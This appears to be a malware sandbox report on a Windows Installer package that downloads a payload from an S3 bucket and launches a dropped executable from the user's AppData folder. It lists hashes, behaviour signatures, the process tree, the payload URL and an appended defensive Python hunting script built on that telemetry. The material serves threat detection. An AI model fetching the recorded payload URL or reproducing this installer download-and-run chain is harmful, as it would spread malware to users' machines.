Analysis

  • max time kernel
    74s
  • max time network
    116s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    23-09-2021 13:37

General

  • Target

    FOLHAS-PAGINAS-ADVOCACIA.msi

  • Size

    2.8MB

  • MD5

    8446fedeadab37c667b02dd7e0fdac26

  • SHA1

    04e9d8f6301946ae9a9fef977a5424f722fd9435

  • SHA256

    f01cc28590e94c1af30ca919a93f2615285f6774f5fc6b7cd8f933fac3303203

  • SHA512

    bfad67c71ac19a608cf03f93c18adb6d8073cc1deba149e8c0763a851c29de4a27064e36fb7a32bc5ffa82af3d45723d4ae34250f21526ef1853d92ef5362df1

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request (3 IoCs)
  • Executes dropped EXE (2 IoCs)
  • Loads dropped DLL (13 IoCs)
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Enumerates connected drives (3 TTPs, 48 IoCs)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory (19 IoCs)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of FindShellTrayWindow (2 IoCs)
  • Suspicious use of WriteProcessMemory (14 IoCs)

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\FOLHAS-PAGINAS-ADVOCACIA.msi
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1544
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:916
    • C:\Windows\syswow64\MsiExec.exe (child of PID 916)
      C:\Windows\syswow64\MsiExec.exe -Embedding 0EC9DF812EA027A8D9129985DE29F146
      • Blocklisted process makes network request
      • Loads dropped DLL
      PID:1600
    • C:\Windows\Installer\MSI2AA7.tmp (child of PID 916)
      "C:\Windows\Installer\MSI2AA7.tmp" /DontWait "C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe"
      • Executes dropped EXE
      PID:1640
  • C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe
    "C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe"
    • Executes dropped EXE
    • Loads dropped DLL
    PID:1768

Network

  • DNS query
    intermediari.s3.us-east-2.amazonaws.com
    Process: MsiExec.exe
    Remote address: 8.8.8.8:53
    Request
    intermediari.s3.us-east-2.amazonaws.com IN A
    Response
    intermediari.s3.us-east-2.amazonaws.com IN CNAME s3-r-w.us-east-2.amazonaws.com
    s3-r-w.us-east-2.amazonaws.com IN A 52.219.96.24
  • HTTP GET
    https://intermediari.s3.us-east-2.amazonaws.com/N9O987TDS.zip
    Process: MsiExec.exe
    Remote address: 52.219.96.24:443
    Request
    GET /N9O987TDS.zip HTTP/1.1
    Accept: */*
    User-Agent: AdvancedInstaller
    Host: intermediari.s3.us-east-2.amazonaws.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    x-amz-id-2: 1Uy4VdOdQEzkdsRbQLQdQ73Cahj7yaR2LqteplNQCJR81u1CdNNjO49wmGRuYB5y15ZfFIVbqSI=
    x-amz-request-id: EAZZ5NRG1GNT8EX3
    Date: Thu, 23 Sep 2021 13:37:48 GMT
    Last-Modified: Tue, 21 Sep 2021 21:09:36 GMT
    ETag: "bcb214ddae34849b9fe721cde898f644"
    Accept-Ranges: bytes
    Content-Type: application/zip
    Server: AmazonS3
    Content-Length: 9144960

  Connection summary

  • 52.219.96.24:443
    Domain: intermediari.s3.us-east-2.amazonaws.com
    Process: MsiExec.exe
    Sent: 152 B (3 packets)
  • 52.219.96.24:443
    URL: https://intermediari.s3.us-east-2.amazonaws.com/N9O987TDS.zip
    Protocols: tls, http
    Process: MsiExec.exe
    Sent: 149.8kB (3245 packets)
    Received: 9.4MB (6441 packets)
    HTTP Request: GET https://intermediari.s3.us-east-2.amazonaws.com/N9O987TDS.zip
    HTTP Response: 200
  • 8.8.8.8:53
    Domain: intermediari.s3.us-east-2.amazonaws.com
    Protocol: dns
    Process: MsiExec.exe
    Sent: 85 B (1 packet)
    Received: 122 B (1 packet)
    DNS Request: intermediari.s3.us-east-2.amazonaws.com
    DNS Response: 52.219.96.24
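The Processes and Network sections together show the pattern worth hunting for on a fleet: Windows Installer (MsiExec.exe, PID 1600) resolves and downloads from an S3 bucket, a custom-action stub extracted to C:\Windows\Installer\MSI2AA7.tmp launches an executable from the user's AppData\Roaming tree, and the installer's "AdvancedInstaller" User-Agent suggests the download and launch were done with ordinary installer-builder features rather than bespoke code, so the same telemetry will also fire on some legitimate packages. The following script is an added example and is not part of the sandbox report or of the sample: it runs three hunts over constructed Sysmon-style events (IDs 1, 3 and 22 as in Sysmon) that mirror the report's process tree and DNS/TCP activity. PIDs, paths, the command lines and the S3 host are taken from the report; the parent PIDs 400 and 500 for the two msiexec instances, and the choice of MSI2AA7.tmp (PID 1640) as the parent of N9O987TDS.exe, are assumptions, as are the event dicts themselves.

```python
"""Added example (not part of the sandbox report or of the sample): three hunts over
constructed Sysmon-style events that mirror this report's process tree and network
activity.  Event IDs follow Sysmon (1 = process create, 3 = network connect,
22 = DNS query); the event dicts are hand-built from the report, not real telemetry."""
import re

# Constructed events modelled on the Processes and Network sections of the report.
# Assumptions: ppid 400/500 stand in for whatever launched the two msiexec instances
# (the report does not show it), and N9O987TDS.exe is given the MSI2AA7.tmp launcher
# as its parent, which is what that stub's /DontWait command line implies.
EVENTS = [
    {"id": 1, "pid": 1544, "ppid": 400, "image": r"C:\Windows\system32\msiexec.exe",
     "cmd": r"msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\FOLHAS-PAGINAS-ADVOCACIA.msi"},
    {"id": 1, "pid": 916, "ppid": 500, "image": r"C:\Windows\system32\msiexec.exe",
     "cmd": r"C:\Windows\system32\msiexec.exe /V"},
    {"id": 1, "pid": 1600, "ppid": 916, "image": r"C:\Windows\syswow64\MsiExec.exe",
     "cmd": r"C:\Windows\syswow64\MsiExec.exe -Embedding 0EC9DF812EA027A8D9129985DE29F146"},
    {"id": 22, "pid": 1600, "image": r"C:\Windows\syswow64\MsiExec.exe",
     "query": "intermediari.s3.us-east-2.amazonaws.com"},
    {"id": 3, "pid": 1600, "image": r"C:\Windows\syswow64\MsiExec.exe",
     "dst": "52.219.96.24", "dport": 443},
    {"id": 1, "pid": 1640, "ppid": 916, "image": r"C:\Windows\Installer\MSI2AA7.tmp",
     "cmd": r'"C:\Windows\Installer\MSI2AA7.tmp" /DontWait '
            r'"C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe"'},
    {"id": 1, "pid": 1768, "ppid": 1640,
     "image": r"C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe",
     "cmd": r'"C:\Users\Admin\AppData\Roaming\Documentacao\Inportagem\N9O987TDS.exe"'},
]

MSIEXEC_RE = re.compile(r"\\msiexec\.exe$", re.IGNORECASE)
# Custom-action stubs that Windows Installer extracts to C:\Windows\Installer\MSIxxxx.tmp
MSI_TMP_RE = re.compile(r"\\Windows\\Installer\\MSI[0-9A-F]{1,4}\.tmp$", re.IGNORECASE)
USER_PROFILE_RE = re.compile(r"^C:\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
# Virtual-hosted S3 names: <bucket>.s3.<region>.amazonaws.com (and the s3-<region> form)
S3_HOST_RE = re.compile(r"^(?P<bucket>[^.]+)\.s3[.-][a-z0-9-]+\.amazonaws\.com$", re.IGNORECASE)


def installer_network_activity(events):
    """Hunt 1: Windows Installer itself resolving names or opening sockets.
    Returns (pid, kind, target) tuples.  This is a triage lead, not a verdict:
    packages built with download-prerequisite features do this legitimately."""
    hits = []
    for e in events:
        if not MSIEXEC_RE.search(e["image"]):
            continue
        if e["id"] == 22:
            hits.append((e["pid"], "dns", e["query"]))
        elif e["id"] == 3:
            hits.append((e["pid"], "tcp", f'{e["dst"]}:{e["dport"]}'))
    return hits


def installer_drops_into_profile(events):
    """Hunt 2: msiexec or an MSI*.tmp custom-action stub starting an executable
    from the user's AppData tree.  Returns (parent_pid, child_pid, image)."""
    by_pid = {e["pid"]: e for e in events if e["id"] == 1}
    hits = []
    for e in events:
        if e["id"] != 1:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        parent_is_msi = MSIEXEC_RE.search(parent["image"]) or MSI_TMP_RE.search(parent["image"])
        if parent_is_msi and USER_PROFILE_RE.match(e["image"]):
            hits.append((parent["pid"], e["pid"], e["image"]))
    return hits


def s3_buckets(events):
    """Hunt 3: S3 bucket names the installer resolved, as a blocklist pivot
    (the bucket name, not the shared S3 endpoint IP, is the stable indicator)."""
    buckets = set()
    for e in events:
        if e["id"] == 22 and MSIEXEC_RE.search(e["image"]):
            m = S3_HOST_RE.match(e["query"])
            if m:
                buckets.add(m.group("bucket"))
    return sorted(buckets)


if __name__ == "__main__":
    for hit in installer_network_activity(EVENTS):
        print("installer network activity:", hit)
    for hit in installer_drops_into_profile(EVENTS):
        print("installer launched binary from user profile:", hit)
    print("S3 buckets to block:", s3_buckets(EVENTS))
```

On this report's data the first hunt returns the DNS lookup and the TCP connection from PID 1600, the second returns the launch of N9O987TDS.exe by the MSI2AA7.tmp stub, and the third yields the bucket name intermediari. Blocking the 52.219.96.24 address would be a poor control, since it is a shared S3 endpoint that rotates; the bucket host name and the dropped path are the indicators to carry forward.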

MITRE ATT&CK Enterprise v6


Downloads

  • memory/1544-54-0x000007FEFBA11000-0x000007FEFBA13000-memory.dmp (Filesize: 8KB)
  • memory/1600-57-0x00000000751D1000-0x00000000751D3000-memory.dmp (Filesize: 8KB)
  • memory/1640-85-0x0000000000340000-0x0000000000342000-memory.dmp (Filesize: 8KB)
